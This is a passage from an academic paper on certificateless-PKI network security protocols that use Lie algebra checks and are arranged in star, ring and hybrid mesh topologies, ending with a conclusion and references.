(Vijayarangan and Vijayasarathy 2005, Vijayarangan 2009), the inverse operations of MP -1 { MP(RC1)}<br />
and MP -1 { MP(RC2)} are performed through a primitive polynomial of LFSR, T -1 -function and deshuffling<br />
and their values RC1 and RC2 must be distinct.<br />
In NSP 3, the server will not satisfy Jacobi identity if an attacker changes RC. The rationale behind on<br />
using Jacobi identity is that a Lie product computed on RC from client end must match with the server.<br />
Then the server checks Jacobi identity and ensures that the same client has sent the Lie product. If<br />
the attacker alters a Lie product, then the server could detect this fraud by verifying Jaboci identity. It<br />
is important to know that Abelian Lie algebras (for every x and y , [x,y] = 0 ) should not be considered.<br />
From the above protocols, we can make out a proposition that dishonest clients can be eliminated in a<br />
Mesh Topology Network (MTN) based on NSP 1,2 and 3. Thus, a system of protocols 1,2,3 can be<br />
plugged into an MTN which brings out a strong and secure network.<br />
322
Natarajan Vijayarangan<br />
The proposed Mesh Topology Network (MTN) is a network where all the protocols (NSP 1, 2 and 3)<br />
are connected to each other and is an integrated network – illustrated in Figure 1. In the topology<br />
network, every protocol is connected to other protocols on the network through hops and each<br />
protocol itself acts as a node (mote). Some are connected through single-hop networks and some<br />
may be connected with more than one hop. It has been designed that the entire mesh network is<br />
continuously connected. Even if one node fails in the mesh network, the network finds an alternate<br />
route to transfer the data.<br />
Network security protocol 1<br />
A group of network<br />
security protocols based<br />
on certificateless PKI<br />
Network security protocol 2<br />
MTN<br />
Network security protocol 3<br />
Figure 1: A cluster of network security protocols supporting MTN<br />
Normally, attackers can break a network using RF direction finding, traffic rate analysis and timecorrelation<br />
monitoring. Whereas, in the proposed MTN, one may not find easily roles played by nodes,<br />
the existence and location of nodes and the current location of specific functions (MP or Lie). Further,<br />
the MTN has been classified into different models (Star, Ring and Hybrid) for serving different<br />
applications. Star-MTN is a collection of communication protocols connected to a central hub which<br />
distributes NSP 1,2 and 3 to nodes. All communication lines traverse to the central hub. The<br />
advantage of this topology is the simplicity of adding additional nodes. This method has applications<br />
in VSAT terminals. In local area network / wide area network where Ring-MTN could be used, each<br />
system is connected to the network in a closed loop or ring. Basically, all systems in the ring are<br />
connected to each other by NSP={NSP 1, MP & Lie functions}. It has the ability to switch over from<br />
NSP 1 into NSP 2 or 3. Hybrid-MTN is proportional to the exponent of the number of nodes. If there<br />
are 'n' nodes in a hybrid communication, it will require n(n-1)/2 network paths to make a full mesh<br />
network. In this model, NSP 1 can be converted to NSP 2 or NSP 3 by exchanging MP or Lie<br />
functions between nodes. This model is widely applicable to telecommunication paths like mobile<br />
roaming and International SMS.<br />
NSP<br />
1<br />
NSP<br />
2<br />
NSP<br />
2<br />
Network<br />
Security<br />
Protocols 1,2,3<br />
NSP 3<br />
NSP<br />
NSP<br />
3<br />
NSP<br />
NSP<br />
NSP<br />
NSP 1<br />
NSP 2<br />
NSP 3<br />
NSP 3<br />
Figure 2: Star-MTN Figure 3: Ring-MTN Figure 4: Hybrid-MTN<br />
323<br />
NSP 2<br />
NSP 1
8. Conclusion<br />
Natarajan Vijayarangan<br />
The network security protocols produced by the system and method in accordance with this invention<br />
described above finds a number of applications in Information Security and Communication channels.<br />
Particularly, they are directly applied in remote sensing, keyless entry, access control and defense<br />
systems. Since these protocols are secure and less computational complexity (compared with<br />
certificate based PKC), they can be together used in MTN to improve the efficiency. In terms of<br />
memory and space, Protocols 1,2 and 3 with ECC-256 bits are suitable for tiny devices. Hence we<br />
conclude that the proposed protocols could be used for multiple applications.<br />
References<br />
Adi Shamir (1984) “Identity-Based Cryptosystems and Signature Schemes”, Advances in Cryptology:<br />
Proceedings of CRYPTO 84, Lecture Notes in Computer Science, vol 7, pp 47-53.<br />
Al-Riyami, S.S. and Paterson, K.G. (2003), “Certificateless Public Key Cryptography”, Advances in Cryptology -<br />
Proceedings of ASIACRYPT -2003.<br />
Bellare, M. and Rogaway, P. (1993) “Random oracles are practical: A paradigm for designing efficient protocols”,<br />
In ACM CCS 93: 1st <strong>Conference</strong> on Computer and Communications Security, pp 62–73, USA.<br />
Bellovin, S.M. and Merritt, M. (1992) “ Encrypted key exchange: Password-based protocols secure against<br />
dictionary attacks”, IEEE Symposium on Security and Privacy, pp 72–84, Oakland, California, USA.<br />
Certicom Research (2000), Standards for efficient cryptography, SEC 1: Elliptic Curve Cryptography, Ver. 1.0,<br />
[Online], Available: http://www.secg.org/download/aid-385/sec1_final.pdf<br />
Diffie, W. and Hellman, M.E. (1976) “New directions in cryptography”, IEEE Transactions on Information Theory,<br />
22(6):644–654.<br />
Hankerson, D., Menezes, A. and Vanstone, S.A. (2004), Guide to Elliptic Curve Cryptography, Springer-Verlag.<br />
Jacobson, Nathan (1979), Lie algebras, Dover Publications, Inc., New York.<br />
MacKenzie, P.D. (2002) The PAK suite: Protocols for password-authenticated key exchange, Contributions to<br />
IEEE P1363.2.<br />
Needham, R.M. and Schroeder, M.D. (1978) “Using encryption for authentication in large networks of<br />
computers”, Communications of the Association for Computing Machinery, 21(21):993– 999.<br />
Vijayarangan, Natarajan (2009) “Design and analysis of Message Pre processing functions for reducing Hash<br />
collisions”, Proceedings of ISSSIS, Coimbatore, India.<br />
Vijayarangan, Natarajan (2009), “Method for preventing and detecting hash collisions of data during the data<br />
transmission”, USPTO Patent Pre-grant No. 20090085780.<br />
Vijayarangan, N. and Kasilingam, S. (2004), “Random number generation using primitive polynomials”,<br />
Proceedings of SSCCII, Italy.<br />
Vijayarangan, N. and Vijayasarathy, R. (2005), “Primitive polynomials testing methodology”, Jour. of Discrete<br />
Mathematical Sciences and Cryptography, vol 8(3), pp 427-435.<br />
324